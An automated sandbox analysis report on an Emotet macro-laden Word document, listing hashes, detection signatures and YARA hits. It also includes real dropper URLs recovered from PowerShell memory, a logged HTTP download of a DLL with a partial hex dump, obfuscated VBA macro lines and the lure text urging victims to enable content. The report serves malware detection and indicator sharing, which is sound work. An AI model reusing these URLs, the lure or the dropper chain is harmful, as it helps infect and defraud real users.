Analysis Report bestand-8881014518 00944.doc

Overview

General Information

Sample Name: bestand-8881014518 00944.doc
Analysis ID: 336501
MD5: 8ce4185f17ed35f43462f2f44c1cfc3d
SHA1: 9c6396150dd23a65c36e84af69e15543cedca4d2
SHA256: 4425de724449dedb3b183a3bfd567f9d3449c2457a1e2fd695019b1b6227e035

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: https://fnjbq.com/wp-includes/rlR/ Avira URL Cloud: Label: malware
Source: http://wap.zhonglisc.com/wp-includes/QryCB/ Avira URL Cloud: Label: malware
Source: http://petafilm.com/wp-admin/4m/ Avira URL Cloud: Label: malware
Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: petafilm.com Virustotal: Detection: 6% Perma Link
Source: http://petafilm.com Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for submitted file
Source: bestand-8881014518 00944.doc Virustotal: Detection: 31% Perma Link
Source: bestand-8881014518 00944.doc ReversingLabs: Detection: 47%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt, 7_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree, 7_2_100021F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree, 7_2_10002730
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: petafilm.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 176.53.69.151:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 176.53.69.151:80

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: http://givingthanksdaily.com/qlE/VeF/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in memory: https://somanap.com/wp-admin/P/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/octet-streamExpires: Wed, 06 Jan 2021 07:53:49 GMTLast-Modified: Wed, 06 Jan 2021 07:53:49 GMTServer: Microsoft-IIS/10.0Set-Cookie: 5ff56c8d1a339=1609919629; expires=Wed, 06-Jan-2021 07:54:49 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="bLH.dll"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Wed, 06 Jan 2021 07:53:48 GMTContent-Length: 192000Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 176.53.69.151 176.53.69.151
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RADORETR RADORETR
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BCD43F3-025D-4403-9DBE-B492A11253DC}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /wp-admin/4m/ HTTP/1.1Host: petafilm.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: petafilm.com
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: http://givingthanksdaily.com/qlE/VeF/
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2102033680.0000000003A65000.00000004.00000001.sdmp String found in binary or memory: http://petafilm.com
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: http://petafilm.com/wp-admin/4m/
Source: powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: http://wap.zhonglisc.com/wp-includes/QryCB/
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2094280611.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099067500.00000000027A0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2101488871.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2096617113.0000000000AF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2097977545.0000000001F07000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000008.00000002.2097194758.0000000001D20000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: http://zieflix.teleskopstore.com/cgi-bin/Gt3S/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: https://fnjbq.com/wp-includes/rlR/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmp String found in binary or memory: https://somanap.com/wp-admin/P/

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2095230919.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107302523.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096491142.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2104856163.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2346371672.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101735840.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101060119.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2101000772.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2107439959.0000000000231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2101688824.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2108653259.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103856048.0000000000240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2099670858.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2098319985.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2106854955.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2108749500.0000000000211000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2104985518.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2096383511.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2103936335.00000000002A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 13.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.230000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.3a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.20a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , Word
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I of I , Words:3 N@m 13 ;a 10096 G
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. O a
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. O a
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Document contains an embedded VBA macro with suspicious strings
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
Source: bestand-8881014518 00944.doc OLE, VBA macro line: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set VJbwzTDT = ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JhiYfXc = HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set DRrKpoA = xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set AybxtEBCJ = bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set uJSEDH = dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set tcYiEMeRH = RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set gQxBD = PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set RkPWCDPC = xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set JADCpjk = rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set eUdbDAHHs = DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set njKwJdA = XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String createtextfile: Set PmBxcD = rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA") Name: Dn5440l_hb7
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set oOysMtDG = xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE") Name: Bp63ahh3hb4hyq
